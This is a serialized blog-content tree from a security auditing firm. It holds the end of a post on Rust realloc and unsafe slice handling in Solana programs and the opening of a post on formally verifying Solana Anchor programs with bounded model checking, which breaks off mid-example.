};\n",{"type":26,"tag":137,"props":20894,"children":20895},{"class":5559,"line":5850},[20896],{"type":26,"tag":137,"props":20897,"children":20898},{"emptyLinePlaceholder":18},[20899],{"type":32,"value":6276},{"type":26,"tag":137,"props":20901,"children":20902},{"class":5559,"line":5878},[20903],{"type":26,"tag":137,"props":20904,"children":20905},{"style":5564},[20906],{"type":32,"value":18732},{"type":26,"tag":137,"props":20908,"children":20909},{"class":5559,"line":5891},[20910,20914,20918,20922,20926,20931,20935,20939,20943,20948,20952,20956,20960,20964,20969,20973],{"type":26,"tag":137,"props":20911,"children":20912},{"style":5590},[20913],{"type":32,"value":7152},{"type":26,"tag":137,"props":20915,"children":20916},{"style":5584},[20917],{"type":32,"value":17905},{"type":26,"tag":137,"props":20919,"children":20920},{"style":5590},[20921],{"type":32,"value":5593},{"type":26,"tag":137,"props":20923,"children":20924},{"style":5573},[20925],{"type":32,"value":17181},{"type":26,"tag":137,"props":20927,"children":20928},{"style":5601},[20929],{"type":32,"value":20930}," { std",{"type":26,"tag":137,"props":20932,"children":20933},{"style":5590},[20934],{"type":32,"value":6072},{"type":26,"tag":137,"props":20936,"children":20937},{"style":5601},[20938],{"type":32,"value":17905},{"type":26,"tag":137,"props":20940,"children":20941},{"style":5590},[20942],{"type":32,"value":6072},{"type":26,"tag":137,"props":20944,"children":20945},{"style":5682},[20946],{"type":32,"value":20947},"from_raw_parts_mut",{"type":26,"tag":137,"props":20949,"children":20950},{"style":5601},[20951],{"type":32,"value":165},{"type":26,"tag":137,"props":20953,"children":20954},{"style":5584},[20955],{"type":32,"value":17905},{"type":26,"tag":137,"props":20957,"children":20958},{"style":5590},[20959],{"type":32,"value":470},{"type":26,"tag":137,"props":20961,"children":20962},{"style":5682},[20963],{"type":32,"value":16479},{"type":26,"tag":137,"props":20965,"children":20966},{"style":5601},[20967],{"type":32,"value":20968},"(), ",{"type":26,"tag":137,"props":20970,"children":20971},{"style":5584},[20972],{"type":32,"value":16313},{"type":26,"tag":137,"props":20974,"children":20975},{"style":5601},[20976],{"type":32,"value":17336},{"type":26,"tag":35,"props":20978,"children":20979},{},[20980,20982,20987,20989,20994,20996,21001,21003],{"type":32,"value":20981},"No more pointer casting except for the one place that actually needs it (since the ABI for the serialized buffer uses a ",{"type":26,"tag":130,"props":20983,"children":20985},{"className":20984},[],[20986],{"type":32,"value":10627},{"type":32,"value":20988}," and not a ",{"type":26,"tag":130,"props":20990,"children":20992},{"className":20991},[],[20993],{"type":32,"value":19194},{"type":32,"value":20995}," for the size field, given that ",{"type":26,"tag":130,"props":20997,"children":20999},{"className":20998},[],[21000],{"type":32,"value":19194},{"type":32,"value":21002}," is architecture-dependent), and no dependency on slice reference internals!",{"type":26,"tag":18065,"props":21004,"children":21005},{},[21006],{"type":26,"tag":41,"props":21007,"children":21011},{"href":21008,"ariaDescribedBy":21009,"dataFootnoteRef":7,"id":21010},"#user-content-fn-slice-unbound-lifetime",[18072],"user-content-fnref-slice-unbound-lifetime",[21012],{"type":32,"value":21013},"6",{"type":26,"tag":21015,"props":21016,"children":21019},"section",{"className":21017,"dataFootnotes":7},[21018],"footnotes",[21020,21027],{"type":26,"tag":92,"props":21021,"children":21024},{"className":21022,"id":18072},[21023],"sr-only",[21025],{"type":32,"value":21026},"Footnotes",{"type":26,"tag":4820,"props":21028,"children":21029},{},[21030,21134,21152,21207,21220,21248],{"type":26,"tag":3430,"props":21031,"children":21033},{"id":21032},"user-content-fn-rc-refs",[21034,21036,21042,21044,21049,21051,21055,21057,21061,21063,21068,21070,21076,21078,21082,21084,21094,21096,21101,21103,21108,21110,21115,21117,21123,21125],{"type":32,"value":21035},"I find it helpful to view owning an ",{"type":26,"tag":130,"props":21037,"children":21039},{"className":21038},[],[21040],{"type":32,"value":21041},"Rc\u003CT>",{"type":32,"value":21043}," as holding a shared reference to the underlying ",{"type":26,"tag":130,"props":21045,"children":21047},{"className":21046},[],[21048],{"type":32,"value":2064},{"type":32,"value":21050}," (stored in the magical land of I-don't-need-to-care-about-this-object-not-living-long-enough known as the heap). Owning the ",{"type":26,"tag":762,"props":21052,"children":21053},{},[21054],{"type":32,"value":19050},{"type":32,"value":21056}," ensures that the actual ",{"type":26,"tag":762,"props":21058,"children":21059},{},[21060],{"type":32,"value":6303},{"type":32,"value":21062}," stays alive, however all you have is a reference to the ",{"type":26,"tag":130,"props":21064,"children":21066},{"className":21065},[],[21067],{"type":32,"value":2064},{"type":32,"value":21069}," (through the ",{"type":26,"tag":130,"props":21071,"children":21073},{"className":21072},[],[21074],{"type":32,"value":21075},"Deref\u003CTarget = T>",{"type":32,"value":21077}," impl) - ",{"type":26,"tag":762,"props":21079,"children":21080},{},[21081],{"type":32,"value":4194},{"type":32,"value":21083}," ownership ",{"type":26,"tag":762,"props":21085,"children":21086},{},[21087,21089],{"type":32,"value":21088},"of the ",{"type":26,"tag":130,"props":21090,"children":21092},{"className":21091},[],[21093],{"type":32,"value":2064},{"type":32,"value":21095},". In short, owning an ",{"type":26,"tag":130,"props":21097,"children":21099},{"className":21098},[],[21100],{"type":32,"value":21041},{"type":32,"value":21102}," is owning a (shared, read-only) reference to ",{"type":26,"tag":130,"props":21104,"children":21106},{"className":21105},[],[21107],{"type":32,"value":2064},{"type":32,"value":21109},", not owning ",{"type":26,"tag":130,"props":21111,"children":21113},{"className":21112},[],[21114],{"type":32,"value":2064},{"type":32,"value":21116}," directly like with ",{"type":26,"tag":130,"props":21118,"children":21120},{"className":21119},[],[21121],{"type":32,"value":21122},"Box\u003CT>",{"type":32,"value":21124},". ",{"type":26,"tag":41,"props":21126,"children":21131},{"href":21127,"ariaLabel":21128,"className":21129,"dataFootnoteBackref":7},"#user-content-fnref-rc-refs","Back to reference 1",[21130],"data-footnote-backref",[21132],{"type":32,"value":21133},"↩",{"type":26,"tag":3430,"props":21135,"children":21137},{"id":21136},"user-content-fn-sendsync",[21138,21144,21145],{"type":26,"tag":130,"props":21139,"children":21141},{"className":21140},[],[21142],{"type":32,"value":21143},"!Send + !Sync",{"type":32,"value":1011},{"type":26,"tag":41,"props":21146,"children":21150},{"href":21147,"ariaLabel":21148,"className":21149,"dataFootnoteBackref":7},"#user-content-fnref-sendsync","Back to reference 2",[21130],[21151],{"type":32,"value":21133},{"type":26,"tag":3430,"props":21153,"children":21155},{"id":21154},"user-content-fn-layout",[21156,21158,21163,21164,21177,21179,21184,21186,21191,21193,21198,21200],{"type":32,"value":21157},"Note that this is a terrible idea for yet another reason: ",{"type":26,"tag":130,"props":21159,"children":21161},{"className":21160},[],[21162],{"type":32,"value":17530},{"type":32,"value":8085},{"type":26,"tag":41,"props":21165,"children":21168},{"href":21166,"rel":21167},"https://docs.rs/solana-program/1.10.30/src/solana_program/account_info.rs.html#15-33",[45],[21169,21171],{"type":32,"value":21170},"not declared with ",{"type":26,"tag":130,"props":21172,"children":21174},{"className":21173},[],[21175],{"type":32,"value":21176},"#[repr(C)]",{"type":32,"value":21178},", meaning that, once again, we're dealing with no layout guarantees. But thanks to the power of blockchain, fixing this ABI interface ",{"type":26,"tag":762,"props":21180,"children":21181},{},[21182],{"type":32,"value":21183},"breaks the entire chain",{"type":32,"value":21185}," since old contracts will no longer work. So, we're stuck with cobbling together ",{"type":26,"tag":762,"props":21187,"children":21188},{},[21189],{"type":32,"value":21190},"some",{"type":32,"value":21192}," kind of interface to the specific layout of the specific ",{"type":26,"tag":130,"props":21194,"children":21196},{"className":21195},[],[21197],{"type":32,"value":19102},{"type":32,"value":21199}," versions used to build on-chain code for all eternity... ",{"type":26,"tag":41,"props":21201,"children":21205},{"href":21202,"ariaLabel":21203,"className":21204,"dataFootnoteBackref":7},"#user-content-fnref-layout","Back to reference 3",[21130],[21206],{"type":32,"value":21133},{"type":26,"tag":3430,"props":21208,"children":21210},{"id":21209},"user-content-fn-rustc-llvm",[21211,21213],{"type":32,"value":21212},"Actually, it's LLVM that does the optimization ",{"type":26,"tag":41,"props":21214,"children":21218},{"href":21215,"ariaLabel":21216,"className":21217,"dataFootnoteBackref":7},"#user-content-fnref-rustc-llvm","Back to reference 4",[21130],[21219],{"type":32,"value":21133},{"type":26,"tag":3430,"props":21221,"children":21223},{"id":21222},"user-content-fn-godbolt",[21224,21231,21233,21239,21241],{"type":26,"tag":41,"props":21225,"children":21228},{"href":21226,"rel":21227},"https://godbolt.org/z/PK46xMbxc",[45],[21229],{"type":32,"value":21230},"Click here",{"type":32,"value":21232}," for a Compiler Explorer link showing this - note that the code for both implementations is almost identical. And yes, it's x86_64 and not eBPF, but unfortunately Compiler Explorer doesn't have Rust ",{"type":26,"tag":130,"props":21234,"children":21236},{"className":21235},[],[21237],{"type":32,"value":21238},"libcore",{"type":32,"value":21240}," available for other architectures yet. ",{"type":26,"tag":41,"props":21242,"children":21246},{"href":21243,"ariaLabel":21244,"className":21245,"dataFootnoteBackref":7},"#user-content-fnref-godbolt","Back to reference 5",[21130],[21247],{"type":32,"value":21133},{"type":26,"tag":3430,"props":21249,"children":21251},{"id":21250},"user-content-fn-slice-unbound-lifetime",[21252,21254,21259,21261,21267,21269,21275,21277,21283,21285,21291,21293,21299,21301,21306,21308],{"type":32,"value":21253},"The astute reader may have noticed that ",{"type":26,"tag":130,"props":21255,"children":21257},{"className":21256},[],[21258],{"type":32,"value":20947},{"type":32,"value":21260}," still returns an unbounded lifetime (notice in the signature ",{"type":26,"tag":130,"props":21262,"children":21264},{"className":21263},[],[21265],{"type":32,"value":21266},"unsafe fn from_raw_parts_mut\u003C'a, T>(data: *mut T, len: usize) -> &'a mut [T]",{"type":32,"value":21268},", the lifetime parameter ",{"type":26,"tag":130,"props":21270,"children":21272},{"className":21271},[],[21273],{"type":32,"value":21274},"'a",{"type":32,"value":21276}," does not appear in the arguments). However, we immediately constrain the lifetime by assigning it to ",{"type":26,"tag":130,"props":21278,"children":21280},{"className":21279},[],[21281],{"type":32,"value":21282},"*slice",{"type":32,"value":21284},", which is ",{"type":26,"tag":130,"props":21286,"children":21288},{"className":21287},[],[21289],{"type":32,"value":21290},"&'info [u8]",{"type":32,"value":21292}," (where ",{"type":26,"tag":130,"props":21294,"children":21296},{"className":21295},[],[21297],{"type":32,"value":21298},"'info",{"type":32,"value":21300}," is the lifetime parameter of the ",{"type":26,"tag":130,"props":21302,"children":21304},{"className":21303},[],[21305],{"type":32,"value":17530},{"type":32,"value":21307}," struct) - this is exactly the lifetime we started with. ",{"type":26,"tag":41,"props":21309,"children":21313},{"href":21310,"ariaLabel":21311,"className":21312,"dataFootnoteBackref":7},"#user-content-fnref-slice-unbound-lifetime","Back to reference 6",[21130],[21314],{"type":32,"value":21133},{"type":26,"tag":7949,"props":21316,"children":21317},{},[21318],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":21320},[21321,21327,21331,21332,21334],{"id":16959,"depth":5412,"text":21322,"children":21323},"Breaking down realloc",[21324,21325],{"id":17125,"depth":5417,"text":17128},{"id":18484,"depth":5417,"text":21326},"Back to realloc",{"id":19436,"depth":5412,"text":19439,"children":21328},[21329,21330],{"id":19442,"depth":5417,"text":19445},{"id":19664,"depth":5417,"text":19667},{"id":19851,"depth":5412,"text":19854},{"id":20251,"depth":5412,"text":21333},"Towards safer unsafe",{"id":18072,"depth":5412,"text":21026},"content:blog:2022-12-09-rust-realloc-and-references.md","blog/2022-12-09-rust-realloc-and-references.md","blog/2022-12-09-rust-realloc-and-references",{"_path":21339,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":21340,"description":21341,"author":21342,"image":21343,"date":21345,"isFeatured":18,"onBlogPage":18,"tags":21346,"body":21347,"_type":5433,"_id":31593,"_source":5435,"_file":31594,"_stem":31595,"_extension":5438},"/blog/2023-01-26-formally-verifying-solana-programs","Solana Formal Verification: A Case Study","We present a novel framework for formal verification of Solana Anchor programs — and a case study application to the Squads multisig.","harrison",{"src":21344,"height":16214,"width":17},"/posts/formally-verifying-solana-programs/formal-verification-title.jpg","2023-01-26",[5450,5451],{"type":23,"children":21348,"toc":31565},[21349,21354,21359,21385,21388,21400,21423,21446,21458,21481,21484,21491,21541,21547,21553,21558,21569,21610,21615,21621,21626,21859,21878,21883,21888,21961,21966,22036,22050,22475,22495,22501,22520,22525,22530,22535,22541,22553,22588,22599,22610,22622,22627,22659,22683,22702,22708,22725,22731,22758,22763,22783,22795,22941,22969,22972,22984,23067,23086,23089,23128,23295,23300,23306,23318,23336,23349,23510,23522,23535,24009,24014,24061,24067,24085,24153,24379,24593,24598,24672,24719,24724,24730,24832,24936,24941,25004,25009,25015,25080,25085,25127,25153,25159,25228,25233,25283,25294,25300,25311,25332,25337,25342,25365,25371,25383,25403,26519,26538,26589,26594,26602,26614,26619,26627,26632,26648,26684,26689,26783,26788,26796,26801,26913,26918,26926,26939,27103,27108,27116,27121,27126,27194,27228,27234,27239,27250,27268,27646,27658,27670,27678,27689,27720,27725,27733,27738,28011,28030,28035,28061,28929,28941,29040,29052,29094,29099,29111,29119,29124,29136,29162,29322,29334,29342,29347,29623,29628,29640,29795,29815,30141,30175,30369,30402,30414,30536,30556,30561,30566,30571,30584,30592,30597,31072,31084,31089,31101,31106,31365,31391,31396,31402,31408,31420,31432,31451,31498,31503,31509,31514,31519,31524,31529,31534,31539,31542,31561],{"type":26,"tag":35,"props":21350,"children":21351},{},[21352],{"type":32,"value":21353},"Since the early days of computing, bugs have crept their way into programs and wreaked havoc on the intentions of the programmer. Logical fallacies, race conditions, or simple typos could manifest as crashes or lay undetected, silently breaking the functionality of the host program.",{"type":26,"tag":35,"props":21355,"children":21356},{},[21357],{"type":32,"value":21358},"When your program is connected to the internet, there is the new risk that bugs may introduce security holes into your system. Even simple buffer overflows can be exploited by skilled attackers to compromise the integrity of your program.",{"type":26,"tag":35,"props":21360,"children":21361},{},[21362,21364,21368,21370,21375,21377,21384],{"type":32,"value":21363},"In the world of Web3 we create programs that talk to strangers ",{"type":26,"tag":762,"props":21365,"children":21366},{},[21367],{"type":32,"value":18964},{"type":32,"value":21369}," control millions of dollars 🤑. Bugs in these programs are some of the ",{"type":26,"tag":762,"props":21371,"children":21372},{},[21373],{"type":32,"value":21374},"juciest",{"type":32,"value":21376},"; anonymous attackers that can find and exploit them will walk away with potentially ",{"type":26,"tag":41,"props":21378,"children":21381},{"href":21379,"rel":21380},"https://rekt.news/leaderboard/",[45],[21382],{"type":32,"value":21383},"hundreds of millions of dollars",{"type":32,"value":470},{"type":26,"tag":3265,"props":21386,"children":21387},{},[],{"type":26,"tag":35,"props":21389,"children":21390},{},[21391,21393,21398],{"type":32,"value":21392},"At OtterSec we are ",{"type":26,"tag":762,"props":21394,"children":21395},{},[21396],{"type":32,"value":21397},"highly skilled in pest control",{"type":32,"value":21399}," - finding and squashing bugs before they are exploited by less well-intentioned hackers. We are constantly striving to improve our techniques and develop new technologies that aid in our auditing processes.",{"type":26,"tag":35,"props":21401,"children":21402},{},[21403,21405,21412,21414,21421],{"type":32,"value":21404},"Recently we were contacted by the ",{"type":26,"tag":41,"props":21406,"children":21409},{"href":21407,"rel":21408},"https://squads.so/",[45],[21410],{"type":32,"value":21411},"Squads team",{"type":32,"value":21413}," to explore how formal verification could be used to verify security-critical properties of Solana programs. We were really excited about this opportunity and have been developing a prototype with the ",{"type":26,"tag":41,"props":21415,"children":21418},{"href":21416,"rel":21417},"https://github.com/Squads-Protocol/squads-mpl",[45],[21419],{"type":32,"value":21420},"Squads Multisig Program",{"type":32,"value":21422}," as our main case study.",{"type":26,"tag":35,"props":21424,"children":21425},{},[21426,21428,21435,21437,21444],{"type":32,"value":21427},"We now have a (mostly) working prototype that can be used to formally verify critical properties of Solana programs in order to ensure a higher level of security. Our tool integrates with ",{"type":26,"tag":41,"props":21429,"children":21432},{"href":21430,"rel":21431},"https://www.anchor-lang.com/",[45],[21433],{"type":32,"value":21434},"anchor-lang",{"type":32,"value":21436}," and provides new APIs to specify invariants for your Solana code. It then autogenerates proof harnesses which are verified with the ",{"type":26,"tag":41,"props":21438,"children":21441},{"href":21439,"rel":21440},"https://github.com/model-checking/kani",[45],[21442],{"type":32,"value":21443},"Kani Rust Verifier",{"type":32,"value":21445},". Additionally, we are implementing a formal-verification-friendly runtime SDK layer that accelerates the expensive process of running formal verification tools on complex code.",{"type":26,"tag":35,"props":21447,"children":21448},{},[21449,21451,21456],{"type":32,"value":21450},"In this blog post, we're excited to share our progress and the challenges we've encountered during the process. We will describe the main concepts behind ",{"type":26,"tag":762,"props":21452,"children":21453},{},[21454],{"type":32,"value":21455},"bounded model checking",{"type":32,"value":21457}," (our formal verification method of choice) and explain how we've applied these concepts to Solana.",{"type":26,"tag":35,"props":21459,"children":21460},{},[21461],{"type":26,"tag":762,"props":21462,"children":21463},{},[21464,21466,21473,21475],{"type":32,"value":21465},"If you're interested in learning more or getting your own programs formally verified, let us know! We'd be excited to chat with you! — Fill out ",{"type":26,"tag":41,"props":21467,"children":21470},{"href":21468,"rel":21469},"https://osec.io/contact",[45],[21471],{"type":32,"value":21472},"this form",{"type":32,"value":21474}," or email us at ",{"type":26,"tag":41,"props":21476,"children":21478},{"href":21477},"mailto:contact@osec.io",[21479],{"type":32,"value":21480},"contact@osec.io",{"type":26,"tag":3265,"props":21482,"children":21483},{},[],{"type":26,"tag":21485,"props":21486,"children":21488},"h4",{"id":21487},"contents",[21489],{"type":32,"value":21490},"Contents:",{"type":26,"tag":4820,"props":21492,"children":21493},{},[21494,21499,21516,21526,21531,21536],{"type":26,"tag":3430,"props":21495,"children":21496},{},[21497],{"type":32,"value":21498},"Formal Verification with Bounded Model Checking\na. Overview\nb. A simple example\nc. Loop bounds & path explosion\nd. The Kani Rust Verifier",{"type":26,"tag":3430,"props":21500,"children":21501},{},[21502,21507,21509,21514],{"type":26,"tag":84,"props":21503,"children":21504},{},[21505],{"type":32,"value":21506},"Specification",{"type":32,"value":21508},": How can we describe what we ",{"type":26,"tag":762,"props":21510,"children":21511},{},[21512],{"type":32,"value":21513},"want",{"type":32,"value":21515}," our program to do?",{"type":26,"tag":3430,"props":21517,"children":21518},{},[21519,21524],{"type":26,"tag":84,"props":21520,"children":21521},{},[21522],{"type":32,"value":21523},"Verification",{"type":32,"value":21525},": How do we check that our model is correct?",{"type":26,"tag":3430,"props":21527,"children":21528},{},[21529],{"type":32,"value":21530},"Case Study: Squads Multisig",{"type":26,"tag":3430,"props":21532,"children":21533},{},[21534],{"type":32,"value":21535},"Additional challenges in Solana",{"type":26,"tag":3430,"props":21537,"children":21538},{},[21539],{"type":32,"value":21540},"Conclusion",{"type":26,"tag":92,"props":21542,"children":21544},{"id":21543},"formal-verification-with-bounded-model-checking",[21545],{"type":32,"value":21546},"Formal Verification with Bounded Model Checking",{"type":26,"tag":118,"props":21548,"children":21550},{"id":21549},"overview",[21551],{"type":32,"value":21552},"Overview",{"type":26,"tag":35,"props":21554,"children":21555},{},[21556],{"type":32,"value":21557},"Formal verification is the process of using a formal specification to verify the correctness of a system. In this case, the systems we are verifying are programs written in Rust that run on the Solana blockchain.",{"type":26,"tag":35,"props":21559,"children":21560},{},[21561,21563,21568],{"type":32,"value":21562},"There are many different flavors of formal verification, however in this research we are using ",{"type":26,"tag":84,"props":21564,"children":21565},{},[21566],{"type":32,"value":21567},"bounded model checking (BMC)",{"type":32,"value":470},{"type":26,"tag":35,"props":21570,"children":21571},{},[21572,21574,21579,21581,21586,21588,21592,21594,21600,21602,21608],{"type":32,"value":21573},"In short, the idea of BMC is to execute our program ",{"type":26,"tag":762,"props":21575,"children":21576},{},[21577],{"type":32,"value":21578},"symbolically",{"type":32,"value":21580}," rather than ",{"type":26,"tag":762,"props":21582,"children":21583},{},[21584],{"type":32,"value":21585},"concretely",{"type":32,"value":21587},". Instead of actually performing an ",{"type":26,"tag":762,"props":21589,"children":21590},{},[21591],{"type":32,"value":12227},{"type":32,"value":21593}," when we see the line ",{"type":26,"tag":130,"props":21595,"children":21597},{"className":21596},[],[21598],{"type":32,"value":21599},"int x = a + b",{"type":32,"value":21601},", we store the symbolic expression ",{"type":26,"tag":130,"props":21603,"children":21605},{"className":21604},[],[21606],{"type":32,"value":21607},"x == a + b",{"type":32,"value":21609},". We do this for every line and once we reach the end of the program we have compiled a huge list of symbolic expressions. At this point, we can feed these expressions to a SMT solver along with a correctness property P in order to check if our program satisfies this property.",{"type":26,"tag":35,"props":21611,"children":21612},{},[21613],{"type":32,"value":21614},"If we hit a branch as we are tracing the program, we will take both sides of the branch adding the positive branch condition as a constraint to one side and the negative condition to the other side.",{"type":26,"tag":118,"props":21616,"children":21618},{"id":21617},"a-simple-example",[21619],{"type":32,"value":21620},"A simple example",{"type":26,"tag":35,"props":21622,"children":21623},{},[21624],{"type":32,"value":21625},"As an example, consider the following function:",{"type":26,"tag":5512,"props":21627,"children":21629},{"code":21628,"language":4326,"meta":7,"className":19107,"style":7},"int foo(int x) {\n    int y = x + 3;\n    int z;\n    if (y > 100) {\n        z = y * 2;\n    } else {\n        z = y + 1;\n    }\n\n    // Property P:\n    assert(z != 105);\n}\n",[21630],{"type":26,"tag":130,"props":21631,"children":21632},{"__ignoreMap":7},[21633,21663,21697,21709,21734,21762,21777,21804,21811,21818,21826,21852],{"type":26,"tag":137,"props":21634,"children":21635},{"class":5559,"line":5560},[21636,21641,21646,21650,21654,21659],{"type":26,"tag":137,"props":21637,"children":21638},{"style":5573},[21639],{"type":32,"value":21640},"int",{"type":26,"tag":137,"props":21642,"children":21643},{"style":5682},[21644],{"type":32,"value":21645}," foo",{"type":26,"tag":137,"props":21647,"children":21648},{"style":5601},[21649],{"type":32,"value":165},{"type":26,"tag":137,"props":21651,"children":21652},{"style":5573},[21653],{"type":32,"value":21640},{"type":26,"tag":137,"props":21655,"children":21656},{"style":5584},[21657],{"type":32,"value":21658}," x",{"type":26,"tag":137,"props":21660,"children":21661},{"style":5601},[21662],{"type":32,"value":17395},{"type":26,"tag":137,"props":21664,"children":21665},{"class":5559,"line":5412},[21666,21671,21675,21679,21684,21688,21693],{"type":26,"tag":137,"props":21667,"children":21668},{"style":5573},[21669],{"type":32,"value":21670},"    int",{"type":26,"tag":137,"props":21672,"children":21673},{"style":5601},[21674],{"type":32,"value":7095},{"type":26,"tag":137,"props":21676,"children":21677},{"style":5590},[21678],{"type":32,"value":289},{"type":26,"tag":137,"props":21680,"children":21681},{"style":5601},[21682],{"type":32,"value":21683}," x ",{"type":26,"tag":137,"props":21685,"children":21686},{"style":5590},[21687],{"type":32,"value":356},{"type":26,"tag":137,"props":21689,"children":21690},{"style":5626},[21691],{"type":32,"value":21692}," 3",{"type":26,"tag":137,"props":21694,"children":21695},{"style":5601},[21696],{"type":32,"value":5604},{"type":26,"tag":137,"props":21698,"children":21699},{"class":5559,"line":5417},[21700,21704],{"type":26,"tag":137,"props":21701,"children":21702},{"style":5573},[21703],{"type":32,"value":21670},{"type":26,"tag":137,"props":21705,"children":21706},{"style":5601},[21707],{"type":32,"value":21708}," z;\n",{"type":26,"tag":137,"props":21710,"children":21711},{"class":5559,"line":5642},[21712,21716,21721,21725,21730],{"type":26,"tag":137,"props":21713,"children":21714},{"style":5610},[21715],{"type":32,"value":14870},{"type":26,"tag":137,"props":21717,"children":21718},{"style":5601},[21719],{"type":32,"value":21720}," (y ",{"type":26,"tag":137,"props":21722,"children":21723},{"style":5590},[21724],{"type":32,"value":13052},{"type":26,"tag":137,"props":21726,"children":21727},{"style":5626},[21728],{"type":32,"value":21729}," 100",{"type":26,"tag":137,"props":21731,"children":21732},{"style":5601},[21733],{"type":32,"value":17395},{"type":26,"tag":137,"props":21735,"children":21736},{"class":5559,"line":5745},[21737,21742,21746,21750,21754,21758],{"type":26,"tag":137,"props":21738,"children":21739},{"style":5601},[21740],{"type":32,"value":21741},"        z ",{"type":26,"tag":137,"props":21743,"children":21744},{"style":5590},[21745],{"type":32,"value":289},{"type":26,"tag":137,"props":21747,"children":21748},{"style":5601},[21749],{"type":32,"value":7095},{"type":26,"tag":137,"props":21751,"children":21752},{"style":5590},[21753],{"type":32,"value":7152},{"type":26,"tag":137,"props":21755,"children":21756},{"style":5626},[21757],{"type":32,"value":10519},{"type":26,"tag":137,"props":21759,"children":21760},{"style":5601},[21761],{"type":32,"value":5604},{"type":26,"tag":137,"props":21763,"children":21764},{"class":5559,"line":5850},[21765,21769,21773],{"type":26,"tag":137,"props":21766,"children":21767},{"style":5601},[21768],{"type":32,"value":18371},{"type":26,"tag":137,"props":21770,"children":21771},{"style":5610},[21772],{"type":32,"value":5902},{"type":26,"tag":137,"props":21774,"children":21775},{"style":5601},[21776],{"type":32,"value":5875},{"type":26,"tag":137,"props":21778,"children":21779},{"class":5559,"line":5878},[21780,21784,21788,21792,21796,21800],{"type":26,"tag":137,"props":21781,"children":21782},{"style":5601},[21783],{"type":32,"value":21741},{"type":26,"tag":137,"props":21785,"children":21786},{"style":5590},[21787],{"type":32,"value":289},{"type":26,"tag":137,"props":21789,"children":21790},{"style":5601},[21791],{"type":32,"value":7095},{"type":26,"tag":137,"props":21793,"children":21794},{"style":5590},[21795],{"type":32,"value":356},{"type":26,"tag":137,"props":21797,"children":21798},{"style":5626},[21799],{"type":32,"value":7104},{"type":26,"tag":137,"props":21801,"children":21802},{"style":5601},[21803],{"type":32,"value":5604},{"type":26,"tag":137,"props":21805,"children":21806},{"class":5559,"line":5891},[21807],{"type":26,"tag":137,"props":21808,"children":21809},{"style":5601},[21810],{"type":32,"value":5945},{"type":26,"tag":137,"props":21812,"children":21813},{"class":5559,"line":5909},[21814],{"type":26,"tag":137,"props":21815,"children":21816},{"emptyLinePlaceholder":18},[21817],{"type":32,"value":6276},{"type":26,"tag":137,"props":21819,"children":21820},{"class":5559,"line":5930},[21821],{"type":26,"tag":137,"props":21822,"children":21823},{"style":5564},[21824],{"type":32,"value":21825},"    // Property P:\n",{"type":26,"tag":137,"props":21827,"children":21828},{"class":5559,"line":5939},[21829,21834,21839,21843,21848],{"type":26,"tag":137,"props":21830,"children":21831},{"style":5682},[21832],{"type":32,"value":21833},"    assert",{"type":26,"tag":137,"props":21835,"children":21836},{"style":5601},[21837],{"type":32,"value":21838},"(z ",{"type":26,"tag":137,"props":21840,"children":21841},{"style":5590},[21842],{"type":32,"value":18280},{"type":26,"tag":137,"props":21844,"children":21845},{"style":5626},[21846],{"type":32,"value":21847}," 105",{"type":26,"tag":137,"props":21849,"children":21850},{"style":5601},[21851],{"type":32,"value":6430},{"type":26,"tag":137,"props":21853,"children":21854},{"class":5559,"line":6191},[21855],{"type":26,"tag":137,"props":21856,"children":21857},{"style":5601},[21858],{"type":32,"value":6507},{"type":26,"tag":35,"props":21860,"children":21861},{},[21862,21864,21869,21871,21877],{"type":32,"value":21863},"This function takes an input ",{"type":26,"tag":130,"props":21865,"children":21867},{"className":21866},[],[21868],{"type":32,"value":173},{"type":32,"value":21870}," and does some computation. At the end of the program, the property we want to verify is that ",{"type":26,"tag":130,"props":21872,"children":21874},{"className":21873},[],[21875],{"type":32,"value":21876},"z != 105",{"type":32,"value":470},{"type":26,"tag":35,"props":21879,"children":21880},{},[21881],{"type":32,"value":21882},"With BMC, we could trace this program and derive the following constraints:",{"type":26,"tag":35,"props":21884,"children":21885},{},[21886],{"type":32,"value":21887},"Positive branch:",{"type":26,"tag":5512,"props":21889,"children":21891},{"code":21890,"language":4326,"meta":7,"className":19107,"style":7},"y == x + 3\ny > 100\nz == y * 2\n",[21892],{"type":26,"tag":130,"props":21893,"children":21894},{"__ignoreMap":7},[21895,21920,21936],{"type":26,"tag":137,"props":21896,"children":21897},{"class":5559,"line":5560},[21898,21903,21907,21911,21915],{"type":26,"tag":137,"props":21899,"children":21900},{"style":5601},[21901],{"type":32,"value":21902},"y ",{"type":26,"tag":137,"props":21904,"children":21905},{"style":5590},[21906],{"type":32,"value":11161},{"type":26,"tag":137,"props":21908,"children":21909},{"style":5601},[21910],{"type":32,"value":21683},{"type":26,"tag":137,"props":21912,"children":21913},{"style":5590},[21914],{"type":32,"value":356},{"type":26,"tag":137,"props":21916,"children":21917},{"style":5626},[21918],{"type":32,"value":21919}," 3\n",{"type":26,"tag":137,"props":21921,"children":21922},{"class":5559,"line":5412},[21923,21927,21931],{"type":26,"tag":137,"props":21924,"children":21925},{"style":5601},[21926],{"type":32,"value":21902},{"type":26,"tag":137,"props":21928,"children":21929},{"style":5590},[21930],{"type":32,"value":13052},{"type":26,"tag":137,"props":21932,"children":21933},{"style":5626},[21934],{"type":32,"value":21935}," 100\n",{"type":26,"tag":137,"props":21937,"children":21938},{"class":5559,"line":5417},[21939,21944,21948,21952,21956],{"type":26,"tag":137,"props":21940,"children":21941},{"style":5601},[21942],{"type":32,"value":21943},"z ",{"type":26,"tag":137,"props":21945,"children":21946},{"style":5590},[21947],{"type":32,"value":11161},{"type":26,"tag":137,"props":21949,"children":21950},{"style":5601},[21951],{"type":32,"value":7095},{"type":26,"tag":137,"props":21953,"children":21954},{"style":5590},[21955],{"type":32,"value":7152},{"type":26,"tag":137,"props":21957,"children":21958},{"style":5626},[21959],{"type":32,"value":21960}," 2\n",{"type":26,"tag":35,"props":21962,"children":21963},{},[21964],{"type":32,"value":21965},"Negative branch:",{"type":26,"tag":5512,"props":21967,"children":21969},{"code":21968,"language":4326,"meta":7,"className":19107,"style":7},"y == x + 3\ny \u003C= 100\nz == y + 